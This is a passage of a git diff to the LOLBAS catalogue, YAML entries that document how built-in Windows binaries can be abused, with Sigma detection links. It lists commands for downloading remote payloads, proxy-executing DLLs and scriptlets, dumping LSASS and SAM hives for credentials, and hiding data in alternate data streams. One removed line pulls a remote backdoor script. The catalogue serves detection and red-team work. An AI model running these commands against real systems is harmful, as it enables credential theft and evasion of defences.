b/yml/OSBinaries/Ngen.yml @@ -4,7 +4,7 @@ Description: Microsoft Native Image Generator. Author: Avihay Eldad Created: 2024-02-19 Commands: - - Command: ngen.exe http://example.com/calc.exe + - Command: ngen.exe {REMOTEURL} Description: Downloads payload from remote server using the Microsoft Native Image Generator utility. Usecase: It will download a remote payload and place it in INetCache. Category: Download diff --git a/yml/OSBinaries/Odbcconf.yml b/yml/OSBinaries/Odbcconf.yml index 97d3aa4..74c88ac 100644 --- a/yml/OSBinaries/Odbcconf.yml +++ b/yml/OSBinaries/Odbcconf.yml 
@@ -1,12 +1,12 @@ --- Name: Odbcconf.exe Description: Used in Windows for managing ODBC connections -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: odbcconf /a {REGSVR c:\test\test.dll} - Description: Execute DllREgisterServer from DLL specified. - Usecase: Execute dll file using technique that can evade defensive counter measures + - Command: odbcconf /a {REGSVR {PATH_ABSOLUTE:.dll}} + Description: Execute DllRegisterServer from DLL specified. + Usecase: Execute a DLL file using technique that can evade defensive counter measures Category: Execute Privileges: User MitreID: T1218.008 @@ -14,7 +14,7 @@ Commands: Tags: - Execute: DLL - Command: | - odbcconf INSTALLDRIVER "lolbas-project|Driver=c:\test\test.dll|APILevel=2" + odbcconf INSTALLDRIVER "lolbas-project|Driver={PATH_ABSOLUTE:.dll}|APILevel=2" odbcconf configsysdsn "lolbas-project" "DSN=lolbas-project" Description: Install a driver and load the DLL. Requires administrator privileges. Usecase: Execute dll file using technique that can evade defensive counter measures @@ -24,7 +24,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Command: odbcconf -f file.rsp + - Command: odbcconf -f {PATH:.rsp} Description: Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file. Usecase: Execute dll file using technique that can evade defensive counter measures Category: Execute diff --git a/yml/OSBinaries/Pcalua.yml b/yml/OSBinaries/Pcalua.yml index 7162943..bd3543c 100644 --- a/yml/OSBinaries/Pcalua.yml +++ b/yml/OSBinaries/Pcalua.yml 
@@ -1,10 +1,10 @@ --- Name: Pcalua.exe Description: Program Compatibility Assistant -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: pcalua.exe -a calc.exe + - Command: pcalua.exe -a {PATH:.exe} Description: Open the target .EXE using the Program Compatibility Assistant. Usecase: Proxy execution of binary Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Command: pcalua.exe -a \\server\payload.dll + - Command: pcalua.exe -a {PATH_SMB:.dll} Description: Open the target .DLL file with the Program Compatibilty Assistant. Usecase: Proxy execution of remote dll file Category: Execute @@ -23,7 +23,7 @@ Commands: Tags: - Execute: DLL - Execute: Remote - - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java + - Command: pcalua.exe -a {PATH_ABSOLUTE:.cpl} -c Java Description: Open the target .CPL file with the Program Compatibility Assistant. Usecase: Execution of CPL files Category: Execute diff --git a/yml/OSBinaries/Pcwrun.yml b/yml/OSBinaries/Pcwrun.yml index cf36bb6..11255a0 100644 --- a/yml/OSBinaries/Pcwrun.yml +++ b/yml/OSBinaries/Pcwrun.yml @@ -1,10 +1,10 @@ --- Name: Pcwrun.exe Description: Program Compatibility Wizard -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Pcwrun.exe c:\temp\beacon.exe + - Command: Pcwrun.exe {PATH_ABSOLUTE:.exe} Description: Open the target .EXE file with the Program Compatibility Wizard. Usecase: Proxy execution of binary Category: Execute diff --git a/yml/OSBinaries/Pktmon.yml b/yml/OSBinaries/Pktmon.yml index 0ef714b..3b66b2c 100644 --- a/yml/OSBinaries/Pktmon.yml +++ b/yml/OSBinaries/Pktmon.yml @@ -1,7 +1,7 @@ --- Name: Pktmon.exe Description: Capture Network Packets on the windows 10 with October 2018 Update or later. -Author: 'Derek Johnson' +Author: Derek Johnson Created: 2020-08-12 Commands: - Command: pktmon.exe start --etw 
@@ -21,8 +21,6 @@ Commands: Full_Path: - Path: c:\windows\system32\pktmon.exe - Path: c:\windows\syswow64\pktmon.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml - IOC: .etl files found on system @@ -30,4 +28,3 @@ Resources: - Link: https://binar-x79.com/windows-10-secret-sniffer/ Acknowledgement: - Person: Derek Johnson - Handle: '' diff --git a/yml/OSBinaries/Pnputil.yml b/yml/OSBinaries/Pnputil.yml index 5c45cce..cad47a8 100644 --- a/yml/OSBinaries/Pnputil.yml +++ b/yml/OSBinaries/Pnputil.yml @@ -4,7 +4,7 @@ Description: Used for installing drivers Author: Hai vaknin (lux) Created: 2020-12-25 Commands: - - Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf + - Command: pnputil.exe -i -a {PATH_ABSOLUTE:.inf} Description: Used for installing drivers Usecase: Add malicious driver Category: Execute diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml index 0898d43..0424de8 100644 --- a/yml/OSBinaries/Presentationhost.yml +++ b/yml/OSBinaries/Presentationhost.yml @@ -4,16 +4,16 @@ Description: File is used for executing Browser applications Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Presentationhost.exe C:\temp\Evil.xbap + - Command: Presentationhost.exe {PATH_ABSOLUTE:.xbap} Description: Executes the target XAML Browser Application (XBAP) file - Usecase: Execute code within xbap files + Usecase: Execute code within XBAP files Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: XBAP - - Command: Presentationhost.exe https://example.com/payload + - Command: Presentationhost.exe {REMOTEURL} Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server Category: Download 
diff --git a/yml/OSBinaries/Print.yml b/yml/OSBinaries/Print.yml index 9edacb8..b3fed16 100644 --- a/yml/OSBinaries/Print.yml +++ b/yml/OSBinaries/Print.yml @@ -1,24 +1,24 @@ --- Name: Print.exe Description: Used by Windows to send files to the printer -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe + - Command: print /D:{PATH_ABSOLUTE}:file.exe {PATH_ABSOLUTE:.exe} Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt. Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe - Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe + - Command: print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_ABSOLUTE:.source.exe} + Description: Copy file from source to destination Usecase: Copy files Category: Copy Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe + - Command: print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_SMB:.source.exe} Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe. Usecase: Copy/Download file from remote server Category: Copy @@ -28,8 +28,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\print.exe - Path: C:\Windows\SysWOW64\print.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml - IOC: Print.exe retrieving files from internet diff --git a/yml/OSBinaries/PrintBrm.yml b/yml/OSBinaries/PrintBrm.yml index cd9f68d..d05c4cb 100644 --- a/yml/OSBinaries/PrintBrm.yml 
+++ b/yml/OSBinaries/PrintBrm.yml @@ -1,10 +1,10 @@ --- Name: PrintBrm.exe Description: Printer Migration Command-Line Tool -Author: 'Elliot Killick' +Author: Elliot Killick Created: 2021-06-21 Commands: - - Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip + - Command: PrintBrm -b -d {PATH_SMB:folder} -f {PATH_ABSOLUTE:.zip} Description: Create a ZIP file from a folder in a remote drive Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file Category: Download @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Type: Compression - - Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder + - Command: PrintBrm -r -f {PATH_ABSOLUTE}:hidden.zip -d {PATH_ABSOLUTE:folder} Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder Category: ADS diff --git a/yml/OSBinaries/Provlaunch.yml b/yml/OSBinaries/Provlaunch.yml index 16d6a11..fe6fef7 100644 --- a/yml/OSBinaries/Provlaunch.yml +++ b/yml/OSBinaries/Provlaunch.yml 
@@ -5,7 +5,7 @@ Author: Grzegorz Tworek Created: 2023-06-30 Commands: - Command: provlaunch.exe LOLBin - Description: 'Executes command defined in the Registry. Requires 3 levels of the key structure containing some keywords. Such keys may be created with two reg.exe commands, e.g. "reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0" and "reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe". Registry keys are deleted after successful execution.' + Description: 'Executes command defined in the Registry. Requires 3 levels of the key structure containing some keywords. Such keys may be created with two reg.exe commands, e.g. `reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0` and `reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe`. Registry keys are deleted after successful execution.' Usecase: Executes arbitrary command Category: Execute Privileges: Administrator diff --git a/yml/OSBinaries/Psr.yml b/yml/OSBinaries/Psr.yml index 1d6d78a..1fe6114 100644 --- a/yml/OSBinaries/Psr.yml +++ b/yml/OSBinaries/Psr.yml @@ -4,7 +4,7 @@ Description: Windows Problem Steps Recorder, used to record screen and clicks. Author: Leon Rodenko Created: 2020-06-27 Commands: - - Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0 + - Command: psr.exe /start /output {PATH_ABSOLUTE:.zip} /sc 1 /gui 0 Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file. Usecase: Can be used to take screenshots of the user environment Category: Reconnaissance 
@@ -14,8 +14,6 @@ Commands: Full_Path: - Path: c:\windows\system32\psr.exe - Path: c:\windows\syswow64\psr.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml - IOC: psr.exe spawned diff --git a/yml/OSBinaries/Rasautou.yml b/yml/OSBinaries/Rasautou.yml index 5ddc561..2dc5885 100644 --- a/yml/OSBinaries/Rasautou.yml +++ b/yml/OSBinaries/Rasautou.yml @@ -1,10 +1,10 @@ --- Name: Rasautou.exe Description: Windows Remote Access Dialer -Author: 'Tony Lambert' +Author: Tony Lambert Created: 2020-01-10 Commands: - - Command: rasautou -d powershell.dll -p powershell -a a -e e + - Command: rasautou -d {PATH:.dll} -p export_name -a a -e e Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10. Usecase: Execute DLL code Category: Execute diff --git a/yml/OSBinaries/Rdrleakdiag.yml b/yml/OSBinaries/Rdrleakdiag.yml index 6fa5d38..65ec192 100644 --- a/yml/OSBinaries/Rdrleakdiag.yml +++ b/yml/OSBinaries/Rdrleakdiag.yml 
@@ -4,21 +4,21 @@ Description: Microsoft Windows resource leak diagnostic tool Author: 'John Dwyer' Created: 2022-05-18 Commands: - - Command: rdrleakdiag.exe /p 940 /o c:\evil /fullmemdmp /wait 1 + - Command: rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1 Description: Dump process by PID and create a dump file (Creates files called minidump_.dmp and results_.hlk). Usecase: Dump process by PID. Category: Dump Privileges: User MitreID: T1003 OperatingSystem: Windows - - Command: rdrleakdiag.exe /p 832 /o c:\evil /fullmemdmp /wait 1 + - Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1 Description: Dump LSASS process by PID and create a dump file (Creates files called minidump_.dmp and results_.hlk). Usecase: Dump LSASS process. Category: Dump Privileges: Administrator MitreID: T1003.001 OperatingSystem: Windows - - Command: rdrleakdiag.exe /p 832 /o c:\evil /fullmemdmp /snap + - Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /snap Description: After dumping a process using /wait 1, subsequent dumps must use /snap (Creates files called minidump_.dmp and results_.hlk). Usecase: Dump LSASS process mutliple times. Category: Dump @@ -28,8 +28,6 @@ Commands: Full_Path: - Path: c:\windows\system32\rdrleakdiag.exe - Path: c:\Windows\SysWOW64\rdrleakdiag.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml - Elastic: https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html diff --git a/yml/OSBinaries/Reg.yml b/yml/OSBinaries/Reg.yml index fa6a9fc..8fbce7b 100644 --- a/yml/OSBinaries/Reg.yml +++ b/yml/OSBinaries/Reg.yml 
@@ -1,17 +1,17 @@ --- Name: Reg.exe Description: Used to manipulate the registry -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg + - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg {PATH_ABSOLUTE}:evilreg.reg Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream. Usecase: Hide/plant registry information in Alternate data stream for later use Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: reg save HKLM\SECURITY c:\test\security.bak && reg save HKLM\SYSTEM c:\test\system.bak && reg save HKLM\SAM c:\test\sam.bak + - Command: reg save HKLM\SECURITY {PATH_ABSOLUTE:.1.bak} && reg save HKLM\SYSTEM {PATH_ABSOLUTE:.2.bak} && reg save HKLM\SAM {PATH_ABSOLUTE:.3.bak} Description: Dump registry hives (SAM, SYSTEM, SECURITY) to retrieve password hashes and key material Usecase: Dump credentials from the Security Account Manager (SAM) Category: Credentials @@ -21,8 +21,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\reg.exe - Path: C:\Windows\SysWOW64\reg.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index a5314d1..28c3b3d 100644 --- a/yml/OSBinaries/Regasm.yml +++ b/yml/OSBinaries/Regasm.yml 
@@ -1,11 +1,11 @@ --- Name: Regasm.exe Description: Part of .NET -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: regasm.exe AllTheThingsx64.dll - Description: Loads the target .Net DLL file and executes the RegisterClass function. + - Command: regasm.exe {PATH:.dll} + Description: Loads the target .NET DLL file and executes the RegisterClass function. Usecase: Execute code and bypass Application whitelisting Category: AWL Bypass Privileges: Local Admin @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL (.NET) - - Command: regasm.exe /U AllTheThingsx64.dll + - Command: regasm.exe /U {PATH:.dll} Description: Loads the target .DLL file and executes the UnRegisterClass function. Usecase: Execute code and bypass Application whitelisting Category: Execute diff --git a/yml/OSBinaries/Regedit.yml b/yml/OSBinaries/Regedit.yml index fec34d0..d55399d 100644 --- a/yml/OSBinaries/Regedit.yml +++ b/yml/OSBinaries/Regedit.yml @@ -1,17 +1,17 @@ --- Name: Regedit.exe Description: Used by Windows to manipulate registry -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey + - Command: regedit /E {PATH_ABSOLUTE}:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey Description: Export the target Registry key to the specified .REG file. Usecase: Hide registry data in alternate data stream Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: regedit C:\ads\file.txt:regfile.reg + - Command: regedit {PATH_ABSOLUTE}:regfile.reg Description: Import the target .REG file into the Registry. Usecase: Import hidden registry data from alternate data stream Category: ADS 
@@ -20,8 +20,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\regedit.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml - IOC: regedit.exe reading and writing to alternate data stream diff --git a/yml/OSBinaries/Regini.yml b/yml/OSBinaries/Regini.yml index c378df8..d8f1c90 100644 --- a/yml/OSBinaries/Regini.yml +++ b/yml/OSBinaries/Regini.yml @@ -1,10 +1,10 @@ --- Name: Regini.exe Description: Used to manipulate the registry -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2020-07-03 Commands: - - Command: regini.exe newfile.txt:hidden.ini + - Command: regini.exe {PATH}:hidden.ini Description: Write registry keys from data inside the Alternate data stream. Usecase: Write to registry Category: ADS @@ -14,8 +14,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\regini.exe - Path: C:\Windows\SysWOW64\regini.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_ads.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_execution.yml diff --git a/yml/OSBinaries/Register-cimprovider.yml b/yml/OSBinaries/Register-cimprovider.yml index e2f2b62..2b56957 100644 --- a/yml/OSBinaries/Register-cimprovider.yml +++ b/yml/OSBinaries/Register-cimprovider.yml 
@@ -1,10 +1,10 @@ --- Name: Register-cimprovider.exe Description: Used to register new wmi providers -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Register-cimprovider -path "C:\folder\evil.dll" + - Command: Register-cimprovider -path {PATH_ABSOLUTE:.dll} Description: Load the target .DLL. Usecase: Execute code within dll file Category: Execute @@ -16,8 +16,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\Register-cimprovider.exe - Path: C:\Windows\SysWOW64\Register-cimprovider.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml - IOC: Register-cimprovider.exe execution and cmdline DLL load may be supsicious diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index b1fde20..0f7ed88 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -1,11 +1,11 @@ --- Name: Regsvcs.exe Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: regsvcs.exe AllTheThingsx64.dll - Description: Loads the target .Net DLL file and executes the RegisterClass function. + - Command: regsvcs.exe {PATH:.dll} + Description: Loads the target .NET DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: Execute Privileges: User 
@@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL (.NET) - - Command: regsvcs.exe AllTheThingsx64.dll - Description: Loads the target .Net DLL file and executes the RegisterClass function. + - Command: regsvcs.exe {PATH:.dll} + Description: Loads the target .NET DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: AWL Bypass Privileges: Local Admin diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml index 979d24d..10fa857 100644 --- a/yml/OSBinaries/Regsvr32.yml +++ b/yml/OSBinaries/Regsvr32.yml @@ -1,10 +1,10 @@ --- Name: Regsvr32.exe Description: Used by Windows to register dlls -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll + - Command: regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. Usecase: Execute code from remote scriptlet, bypass Application whitelisting Category: AWL Bypass @@ -14,7 +14,7 @@ Commands: Tags: - Execute: SCT - Execute: Remote - - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll + - Command: regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting Category: AWL Bypass @@ -23,7 +23,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: SCT - - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll + - Command: regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. Usecase: Execute code from remote scriptlet, bypass Application whitelisting Category: Execute 
@@ -33,7 +33,7 @@ Commands: Tags: - Execute: SCT - Execute: Remote - - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll + - Command: regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting Category: Execute diff --git a/yml/OSBinaries/Replace.yml b/yml/OSBinaries/Replace.yml index af90c13..4cd6b86 100644 --- a/yml/OSBinaries/Replace.yml +++ b/yml/OSBinaries/Replace.yml @@ -1,18 +1,18 @@ --- Name: Replace.exe Description: Used to replace file with another file -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: replace.exe C:\Source\File.cab C:\Destination /A - Description: Copy file.cab to destination + - Command: replace.exe {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE:folder} /A + Description: Copy .cab file to destination Usecase: Copy files Category: Copy Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A - Description: Download/Copy bar.exe to outdir + - Command: replace.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:folder} /A + Description: Download/Copy executable to specified folder Usecase: Download file Category: Download Privileges: User @@ -21,8 +21,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\replace.exe - Path: C:\Windows\SysWOW64\replace.exe -Code_Sample: - - Code: Detection: - IOC: Replace.exe retrieving files from remote server - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml diff --git a/yml/OSBinaries/Rpcping.yml b/yml/OSBinaries/Rpcping.yml index f20ddd2..db621d5 100644 --- a/yml/OSBinaries/Rpcping.yml +++ b/yml/OSBinaries/Rpcping.yml 
@@ -1,7 +1,7 @@ --- Name: Rpcping.exe Description: Used to verify rpc connection -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM @@ -21,8 +21,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\rpcping.exe - Path: C:\Windows\SysWOW64\rpcping.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml Resources: diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index d1941d1..9061548 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -1,20 +1,20 @@ --- Name: Rundll32.exe Description: Used by Windows to execute dll files -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: rundll32.exe AllTheThingsx64,EntryPoint - Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute. - Usecase: Execute dll file + - Command: rundll32.exe {PATH},EntryPoint + Description: First part should be a DLL file (any extension accepted), EntryPoint should be the name of the entry point in the DLL file to execute. + Usecase: Execute DLL file Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint - Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute. + - Command: rundll32.exe {PATH_SMB:.dll},EntryPoint + Description: Execute a DLL from an SMB share. EntryPoint is the name of the entry point in the DLL file to execute. Usecase: Execute DLL from SMB share. Category: Execute Privileges: User 
@@ -23,16 +23,7 @@ Commands: Tags: - Execute: DLL - Execute: Remote - - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); - Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. - Usecase: Proxy execution - Category: Execute - Privileges: User - MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Tags: - - Execute: JScript - - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") + - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:{REMOTEURL}") Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. Usecase: Execute code from Internet Category: Execute @@ -41,7 +32,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: JScript - - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain + - Command: rundll32 "{PATH}:ADSDLL.dll",DllMain Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). Usecase: Execute code from alternate data stream Category: ADS diff --git a/yml/OSBinaries/Runexehelper.yml b/yml/OSBinaries/Runexehelper.yml index eafab60..0351b3a 100644 --- a/yml/OSBinaries/Runexehelper.yml +++ b/yml/OSBinaries/Runexehelper.yml 
@@ -4,7 +4,7 @@ Description: Launcher process Author: Grzegorz Tworek Created: 2022-12-13 Commands: - - Command: runexehelper.exe c:\windows\system32\calc.exe + - Command: runexehelper.exe {PATH_ABSOLUTE:.exe} Description: 'Launches the specified exe. Prerequisites: (1) diagtrack_action_output environment variable must be set to an existing, writable folder; (2) runexewithargs_output.txt file cannot exist in the folder indicated by the variable.' Usecase: Executes arbitrary code Category: Execute diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml index 40b17aa..e4a8e06 100644 --- a/yml/OSBinaries/Runonce.yml +++ b/yml/OSBinaries/Runonce.yml @@ -1,11 +1,11 @@ --- Name: Runonce.exe Description: Executes a Run Once Task that has been configured in the registry -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Runonce.exe /AlternateShellStartup - Description: Executes a Run Once Task that has been configured in the registry + Description: Executes a Run Once Task that has been configured in the registry. Usecase: Persistence, bypassing defensive counter measures Category: Execute Privileges: Administrator @@ -16,8 +16,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\runonce.exe - Path: C:\Windows\SysWOW64\runonce.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_runonce_execution.yml diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml index cd8d443..667b384 100644 --- 